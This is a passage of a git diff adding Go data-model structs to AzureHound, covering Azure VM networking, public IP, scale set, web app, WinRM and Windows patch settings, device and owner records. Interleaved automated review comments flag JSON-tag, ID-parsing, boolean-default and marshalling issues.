Possible values are: 'IPv4' and 'IPv6'. + PrivateIPAddressVersion string `json:"privateIpAddressVersion,omitempty"` + + // The publicIPAddressConfiguration. + PublicIPAddressConfiguration VMPublicIPConfig `json:"publicIpAddressConfiguration,omitempty"` + + // Specifies the identifier of the subnet. + Subnet SubResource `json:"subnet,omitempty"` +} diff --git a/models/azure/vm_ip_tag.go b/models/azure/vm_ip_tag.go new file mode 100644 index 0000000..98cfadc --- /dev/null +++ b/models/azure/vm_ip_tag.go @@ -0,0 +1,27 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// Contains the IP tag associated with the public IP address. +type VMIPTag struct { + // IP tag type. Example: FirstPartyUsage. + IPTagType string `json:"ipTagType,omitempty"` + + // IP tag associated with the public IP. Example: SQL, Storage etc. + Tag string `json:"tag,omitempty"` +} diff --git a/models/azure/vm_network_interface_config_props.go b/models/azure/vm_network_interface_config_props.go new file mode 100644 index 0000000..c19f8c3 --- /dev/null +++ b/models/azure/vm_network_interface_config_props.go 
@@ -0,0 +1,49 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+import "github.com/bloodhoundad/azurehound/v2/enums"
+
+type VMNetworkInterfaceConfigurationProperties struct {
+ // Specify what happens to the network interface when the VM is deleted.
+ DeleteOption enums.VMDeleteOption `json:"deleteOption,omitempty"`
+
+ // The dns settings to be applied on the network interfaces.
+ DNSSettings VMNetworkInterfaceDNSSettings `json:"dnsSettings,omitempty"`
+
+ // The DSCP resource to be applied to the network interfaces.
+ DSCPConfiguration SubResource `json:"dscpConfiguration,omitempty"`
+
+ // Specifies whether the network interface is accelerated networking-enabled.
+ EnabledAcceleratedNetworking bool `json:"enabledAcceleratedNetworking,omitempty"`
+
+ // Specifies whether the network is FPGA networking-enabled
+ EnableFpga bool `json:"enableFpga,omitempty"`
+
+ // Whether IP forwarding is enabled on this NIC.
+ EnableIPForwarding bool `json:"enableIPForwarding,omitempty"`
+
+ // Specifies the IP configurations of the network interface.
+ IPConfigurations []VMNetworkInterfaceIPConfig `json:"ipConfigurations,omitempty"`
+
+ // The network security group.
+ NetworkSecurityGroup SubResource `json:"networkSecurityGroup,omitempty"`
+
+ // Specifies the primary network interface in case the virtual machine has more than one.
+ Primary bool `json:"primary,omitempty"`
+}
diff --git a/models/azure/vm_network_interface_dns_settings.go b/models/azure/vm_network_interface_dns_settings.go
new file mode 100644
index 0000000..c318659
--- /dev/null
+++ b/models/azure/vm_network_interface_dns_settings.go
@@ -0,0 +1,24 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+// Describes a virtual machine network configuration's DNS settings.
+type VMNetworkInterfaceDNSSettings struct {
+ // List of DNS server IP addresses
+ DNSServers []string `json:"dnsServers,omitempty"`
+}
diff --git a/models/azure/vm_network_interface_ip_config.go b/models/azure/vm_network_interface_ip_config.go
new file mode 100644
index 0000000..0a15ba0
--- /dev/null
+++ b/models/azure/vm_network_interface_ip_config.go
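Review bot: The JSON tag on `EnabledAcceleratedNetworking` in `VMNetworkInterfaceConfigurationProperties` reads `enabledAcceleratedNetworking`, while the two sibling flags use `enableFpga` and `enableIPForwarding`; as far as I know the Azure property is `enableAcceleratedNetworking`, so this field would silently stay false on decode. encoding/json matches keys case-insensitively but not across a spelling difference, and an unmatched key raises no error. I would change the tag to `json:"enableAcceleratedNetworking,omitempty"` and, if the exported name can still change, rename the field to `EnableAcceleratedNetworking` to match.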
@@ -0,0 +1,23 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// Describes a virtual machine network profile's IP configuration. +type VMNetworkInterfaceIPConfig struct { + Properties VMIPConfigProperties `json:"properties,omitempty"` +} diff --git a/models/azure/vm_public_ip_config.go b/models/azure/vm_public_ip_config.go new file mode 100644 index 0000000..23d8b72 --- /dev/null +++ b/models/azure/vm_public_ip_config.go 
@@ -0,0 +1,29 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// Describes a virtual machines IP Configuration's PublicIPAddress configuration. +type VMPublicIPConfig struct { + // The public IP address configuration name. + Name string `json:"name,omitempty"` + + Properties VMPublicIPConfigProperties `json:"properties,omitempty"` + + // Describes the public IP Sku + Sku VMPublicIPSku `json:"sku,omitempty"` +} diff --git a/models/azure/vm_public_ip_config_props.go b/models/azure/vm_public_ip_config_props.go new file mode 100644 index 0000000..21dfc25 --- /dev/null +++ b/models/azure/vm_public_ip_config_props.go 
@@ -0,0 +1,43 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import ( + "github.com/bloodhoundad/azurehound/v2/enums" +) + +type VMPublicIPConfigProperties struct { + // Specify what happens to the public IP address when the VM is deleted. + DeleteOption enums.VMDeleteOption `json:"deleteOption,omitempty"` + + // The dns settings to be applied on the publicIP addresses. + DNSSettings VMPublicIPDNSSettings `json:"dnsSettings,omitempty"` + + // The idle timeout of the public IP address. + IdleTimeoutInMinutes int `json:"idleTimeoutInMinutes,omitempty"` + + // The list of IP tags associated with the public IP address. + IPTags []VMIPTag `json:"ipTags,omitempty"` + + // Available from Api-Version 2019-07-01 onwards, it represents whether the specific ipconfiguration is IPv4 or IPv6. + // Default is taken as IPv4. Possible values are: 'IPv4' and 'IPv6'. + PublicIPAddressVersion string `json:"publicIpAddressVersion,omitempty"` + + // Specify the public IP allocation type. + PublicIPAllocationMethod enums.IPAllocationMethod `json:"publicIpAllocationMethod,omitempty"` +} diff --git a/models/azure/vm_public_ip_dns_settings.go b/models/azure/vm_public_ip_dns_settings.go new file mode 100644 index 0000000..ae085ac --- /dev/null +++ b/models/azure/vm_public_ip_dns_settings.go 
@@ -0,0 +1,25 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// Describes a virtual machines network configuration's DNS settings. +type VMPublicIPDNSSettings struct { + // The Domain name label prefix of the PublicIPAddress resources that will be created. The generated name label is + // the concatenation of the domain name label and vm network profile unique ID. + DomainNameLabel string `json:"domainNameLabel,omitempty"` +} diff --git a/models/azure/vm_public_ip_sku.go b/models/azure/vm_public_ip_sku.go new file mode 100644 index 0000000..9251d77 --- /dev/null +++ b/models/azure/vm_public_ip_sku.go 
@@ -0,0 +1,31 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import ( + "github.com/bloodhoundad/azurehound/v2/enums" +) + +// Describes the public IP Sku +type VMPublicIPSku struct { + // Specify the public IP sku name. + Name enums.IPSku `json:"name,omitempty"` + + // Specify the public IP sky tier. + Tier enums.IPSkuTier `json:"tier,omitempty"` +} diff --git a/models/azure/vm_scale_set.go b/models/azure/vm_scale_set.go new file mode 100644 index 0000000..3d89b1f --- /dev/null +++ b/models/azure/vm_scale_set.go 
@@ -0,0 +1,51 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+import "strings"
+
+type VMScaleSet struct {
+ Entity
+
+ ExtendedLocation ExtendedLocation `json:"extendedLocation,omitempty"`
+ Identity ManagedIdentity `json:"identity,omitempty"`
+ Location string `json:"location,omitempty"`
+ Name string `json:"name,omitempty"`
+ Plan Plan `json:"plan,omitempty"`
+ Tags map[string]string `json:"tags,omitempty"`
+ Type string `json:"type,omitempty"`
+ Zones []string `json:"zones,omitempty"`
+}
+
+func (s VMScaleSet) ResourceGroupName() string {
+ parts := strings.Split(s.Id, "/")
+ if len(parts) > 4 {
+ return parts[4]
+ } else {
+ return ""
+ }
+}
+
+func (s VMScaleSet) ResourceGroupId() string {
+ parts := strings.Split(s.Id, "/")
+ if len(parts) > 5 {
+ return strings.Join(parts[:5], "/")
+ } else {
+ return ""
+ }
+}
diff --git a/models/azure/vm_size_props.go b/models/azure/vm_size_props.go
new file mode 100644
index 0000000..ce7f01e
--- /dev/null
+++ b/models/azure/vm_size_props.go
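Review bot: `ResourceGroupName` and `ResourceGroupId` on `VMScaleSet` pick segments by position from `s.Id` without checking that the ID has the `/subscriptions/{id}/resourceGroups/{name}` shape, so an ID scoped differently would yield an unrelated segment as the resource group instead of an empty string. The two bounds also disagree: an ID with exactly five segments gives a name but an empty group ID. The same pair is repeated verbatim on `WebApp` in models/azure/web_app.go, so a shared helper that validates the prefix would fix both and remove the `else` after `return`. `s.Id` presumably comes from the embedded `Entity`, which is declared outside this hunk.

```go
// resourceGroupParts splits an ARM resource ID and reports whether it starts
// with /subscriptions/{id}/resourceGroups/{name}.
func resourceGroupParts(id string) ([]string, bool) {
	parts := strings.Split(id, "/")
	if len(parts) < 5 ||
		!strings.EqualFold(parts[1], "subscriptions") ||
		!strings.EqualFold(parts[3], "resourceGroups") {
		return nil, false
	}
	return parts, true
}

func (s VMScaleSet) ResourceGroupName() string {
	if parts, ok := resourceGroupParts(s.Id); ok {
		return parts[4]
	}
	return ""
}

func (s VMScaleSet) ResourceGroupId() string {
	if parts, ok := resourceGroupParts(s.Id); ok {
		return strings.Join(parts[:5], "/")
	}
	return ""
}
```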
@@ -0,0 +1,32 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// Specifies VM Size Property settings on the virtual machine. +type VMSizeProperties struct { + // Specifies the number of vCPUs available for the VM. + // When this property is not specified in the request body the default behavior is to set it to the value of vCPUs + // available for that VM size exposed in api response of List all available virtual machine sizes in a region. + VCPUsAvailable int `json:"vCPUsAvailable,omitempty"` + + // Specifies the vCPU to physical core ratio. + // When this property is not specified in the request body the default behavior is set to the value of vCPUsPerCore + // for the VM Size exposed in api response of List all available virtual machine sizes in a region. + // Setting this property to 1 also means that hyper-threading is disabled. + VCPUsPerCore int `json:"vCPUsPerCore,omitempty"` +} diff --git a/models/azure/web_app.go b/models/azure/web_app.go new file mode 100644 index 0000000..9ef401d --- /dev/null +++ b/models/azure/web_app.go 
@@ -0,0 +1,50 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import "strings" + +// Mapped according to https://learn.microsoft.com/en-us/rest/api/appservice/web-apps/get#site +type WebApp struct { + Entity + + Identity ManagedIdentity `json:"identity,omitempty"` + Kind string `json:"kind,omitempty"` + Location string `json:"location,omitempty"` + Name string `json:"name,omitempty"` + Tags map[string]string `json:"tags,omitempty"` + Type string `json:"type,omitempty"` +} + +func (s WebApp) ResourceGroupName() string { + parts := strings.Split(s.Id, "/") + if len(parts) > 4 { + return parts[4] + } else { + return "" + } +} + +func (s WebApp) ResourceGroupId() string { + parts := strings.Split(s.Id, "/") + if len(parts) > 5 { + return strings.Join(parts[:5], "/") + } else { + return "" + } +} diff --git a/models/azure/web_application.go b/models/azure/web_application.go new file mode 100644 index 0000000..f379aa8 --- /dev/null +++ b/models/azure/web_application.go 
@@ -0,0 +1,35 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// Specifies settings for a web application. +type WebApplication struct { + // Home page or landing page of the application. + HomePageUrl string `json:"homePageUrl,omitempty"` + + // Specifies whether this web application can request tokens using the OAuth 2.0 implicit flow. + ImplicitGrantSettings ImplicitGrantSettings `json:"implicitGrantSettings,omitempty"` + + // Specifies the URL that will be used by Microsoft's authorization service to logout a user using front-channel, + // back-channel or SAML logout protocols. + LogoutUrl string `json:"logoutUrl,omitempty"` + + // Specifies the URLs where user tokens are sent for sign-in, or the redirect URIs where OAuth 2.0 authorization + // codes and access tokens are sent. + RedirectUris []string `json:"redirectUris,omitempty"` +} diff --git a/models/azure/win_rm_config.go b/models/azure/win_rm_config.go new file mode 100644 index 0000000..8b37c41 --- /dev/null +++ b/models/azure/win_rm_config.go 
@@ -0,0 +1,24 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// Describes Windows Remote Management configuration of the VM. +type WinRMConfiguration struct { + // The list of Windows Remote Management listeners. + Listeners []WinRMListener `json:"listeners,omitempty"` +} diff --git a/models/azure/win_rm_listener.go b/models/azure/win_rm_listener.go new file mode 100644 index 0000000..8544408 --- /dev/null +++ b/models/azure/win_rm_listener.go 
@@ -0,0 +1,42 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// Describes Protocol and thumbprint of Windows Remote Management listener. +type WinRMListener struct { + // This is the URL of a certificate that has been uploaded to Key Vault as a secret. + // For adding a secret to the Key Vault, see Add a key or secret to the key vault. In this case, your certificate + // needs to be It is the Base64 encoding of the following JSON Object which is encoded in UTF-8: + // + // ```json + // { + // "data":"", + // "dataType":"pfx", + // "password":"" + // } + // ``` + // To install certificates on a virtual machine it is recommended to use the Azure Key Vault virtual machine + // extension for Linux or the Azure Key Vault virtual machine extension for Windows. + CertificateUrl string `json:"certificateUrl,omitempty"` + + // Specifies the protocol of WinRM listener. + // Possible values are: + // - http + // - https + Protocol string `json:"protocol,omitempty"` +} diff --git a/models/azure/windows_config.go b/models/azure/windows_config.go new file mode 100644 index 0000000..0cacb0b --- /dev/null +++ b/models/azure/windows_config.go 
@@ -0,0 +1,43 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+// Specifies Windows operating system settings on the virtual machine.
+type WindowsConfiguration struct {
+ // Specifies additional base-64 encoded XML formatted information that can be included in the Unattend.xml file,
+ // which is used by Windows Setup.
+ AdditionalUnattendContent []AdditionalUnattendContent `json:"additionalUnattendContent,omitempty"`
+
+ // Indicates whether Automatic Updates is enabled for the Windows virtual machine. Default value is true.
+ // For virtual machine scale sets, this property can be updated and updates will take effect on OS reprovisioning.
+ EnableAutomaticUpdates bool `json:"enableAutomaticUpdates,omitempty"`
+
+ // [Preview Feature] Specifies settings related to VM Guest Patching on Windows.
+ PatchSettings WindowsPatchSettings `json:"patchSettings,omitempty"`
+
+ // Indicates whether virtual machine agent should be provisioned on the virtual machine.
+ // When this property is not specified in the request body, default behavior is to set it to true. This will ensure
+ // that VM Agent is installed on the VM so that extensions can be added to the VM later.
+ ProvisionVMAgent bool `json:"provisionVMAgent,omitempty"`
+
+ // Specifies the time zone of the virtual machine. e.g. "Pacific Standard Time"
+ TimeZone string `json:"timeZone,omitempty"`
+
+ // Specifies the Windows Remote Management listeners. This enables remote Windows PowerShell.
+ WinRM WinRMConfiguration `json:"winRM,omitempty"`
+}
diff --git a/models/azure/windows_patch_settings.go b/models/azure/windows_patch_settings.go
new file mode 100644
index 0000000..e309056
--- /dev/null
+++ b/models/azure/windows_patch_settings.go
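Review bot: `EnableAutomaticUpdates` and `ProvisionVMAgent` in `WindowsConfiguration` are plain `bool` with `omitempty`, although both comments document a default of true. A value absent from the response decodes to false, and an explicit false is dropped again when the struct is re-encoded, so a consumer of the collected data cannot tell "automatic updates disabled" from "not reported". Declaring both fields as `*bool` keeps the three states apart. `EnableHotpatching` in models/azure/windows_patch_settings.go has the same shape.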
@@ -0,0 +1,39 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+// Specifies settings related to VM Guest Patching on Windows.
+type WindowsPatchSettings struct {
+ // Specifies the mode of VM Guest patch assessment for the IaaS virtual machine.
+ // Possible values are:
+ // ImageDefault - You control the timing of patch assessments on a virtual machine.
+ // AutomaticByPlatform - The platform will trigger periodic patch assessments. The property provisionVMAgent must be true.
+ AssessmentMode string `json:"assessmentMode,omitempty"`
+
+ // Enables customers to patch their Azure VMs without requiring a reboot.
+ // For enableHotpatching, the 'provisionVMAgent' must be set to true and 'patchMode' must be set to 'AutomaticByPlatform'.
+ EnableHotpatching bool `json:"enableHotpatching,omitempty"`
+
+ // Specifies the mode of VM Guest Patching to IaaS virtual machine or virtual machines associated to virtual machine
+ // scale set with OrchestrationMode as Flexible.
+ // Possible values are:
+ // Manual - You control the application of patches to a virtual machine. You do this by applying patches manually inside the VM. In this mode, automatic updates are disabled; the property WindowsConfiguration.enableAutomaticUpdates must be false
+ // AutomaticByOS - The virtual machine will automatically be updated by the OS. The property WindowsConfiguration.enableAutomaticUpdates must be true.
+ // AutomaticByPlatform - the virtual machine will automatically updated by the platform. The properties provisionVMAgent and WindowsConfiguration.enableAutomaticUpdates must be true
+ PatchMode string `json:"patchMode,omitempty"`
+}
diff --git a/models/azure/working_hours.go b/models/azure/working_hours.go
new file mode 100644
index 0000000..7844674
--- /dev/null
+++ b/models/azure/working_hours.go
@@ -0,0 +1,34 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+import "github.com/bloodhoundad/azurehound/v2/enums"
+
+type WorkingHours struct {
+ // The days of the week on which the user works.
+ DaysOfWeek []enums.DayOfWeek `json:"daysOfWeek,omitempty"`
+
+ // The time of the day that the user starts working.
+ StartTime string `json:"startTime,omitempty"`
+
+ // The time of the day that the user stops working.
+ EndTime string `json:"endTime,omitempty"`
+
+ // The time zone to which the working hours apply.
+ TimeZone TimeZoneBase `json:"timeZoneBase,omitempty"`
+}
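Review bot: The tag on `WorkingHours.TimeZone` is `timeZoneBase`, which looks like the type name rather than the property name; as far as I know the Microsoft Graph workingHours resource carries this value under `timeZone`. If that is right, the field is never populated on decode and no error is reported. I would change the tag to `json:"timeZone,omitempty"`. `TimeZoneBase` is declared outside this hunk, so confirm against an actual API response before changing it.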
diff --git a/models/container-registry.go b/models/container-registry.go new file mode 100644 index 0000000..c88b819 --- /dev/null +++ b/models/container-registry.go @@ -0,0 +1,28 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package models + +import "github.com/bloodhoundad/azurehound/v2/models/azure" + +type ContainerRegistry struct { + azure.ContainerRegistry + SubscriptionId string `json:"subscriptionId"` + ResourceGroupId string `json:"resourceGroupId"` + ResourceGroupName string `json:"resourceGroupName"` + TenantId string `json:"tenantId"` +} diff --git a/models/device-owner.go b/models/device-owner.go new file mode 100644 index 0000000..5183ce7 --- /dev/null +++ b/models/device-owner.go 
@@ -0,0 +1,44 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package models
+
+import (
+ "encoding/json"
+)
+
+type DeviceOwner struct {
+ Owner json.RawMessage `json:"owner"`
+ DeviceId string `json:"deviceId"`
+}
+
+func (s *DeviceOwner) MarshalJSON() ([]byte, error) {
+ output := make(map[string]any)
+ output["deviceId"] = s.DeviceId
+
+ if owner, err := OmitEmpty(s.Owner); err != nil {
+ return nil, err
+ } else {
+ output["owner"] = owner
+ return json.Marshal(output)
+ }
+}
+
+type DeviceOwners struct {
+ Owners []DeviceOwner `json:"owners"`
+ DeviceId string `json:"deviceId"`
+}
diff --git a/models/device.go b/models/device.go
new file mode 100644
index 0000000..fb26584
--- /dev/null
+++ b/models/device.go
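Review bot: `MarshalJSON` on `DeviceOwner` has a pointer receiver, so encoding/json only calls it for addressable values; `json.Marshal(owner)` on a plain value, or a `DeviceOwner` held in an `any` or as a map value, falls back to the default struct encoding and skips the `OmitEmpty` pass over `Owner`. Elements of `[]DeviceOwner` inside `DeviceOwners` are addressable and do take the custom path, which makes the difference easy to miss in testing. A value receiver, `func (s DeviceOwner) MarshalJSON() ([]byte, error)`, covers both cases. `GroupMember` in models/group-member.go and `GroupOwner` in models/group-owner.go use the same pointer receiver; `OmitEmpty` is defined outside this hunk.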
@@ -0,0 +1,28 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package models + +import ( + "github.com/bloodhoundad/azurehound/v2/models/azure" +) + +type Device struct { + azure.Device + TenantId string `json:"tenantId"` + TenantName string `json:"tenantName"` +} diff --git a/models/function-app.go b/models/function-app.go new file mode 100644 index 0000000..09a67f9 --- /dev/null +++ b/models/function-app.go 
@@ -0,0 +1,28 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package models + +import "github.com/bloodhoundad/azurehound/v2/models/azure" + +type FunctionApp struct { + azure.FunctionApp + SubscriptionId string `json:"subscriptionId"` + ResourceGroupId string `json:"resourceGroupId"` + ResourceGroupName string `json:"resourceGroupName"` + TenantId string `json:"tenantId"` +} diff --git a/models/group-member.go b/models/group-member.go new file mode 100644 index 0000000..2d08eba --- /dev/null +++ b/models/group-member.go 
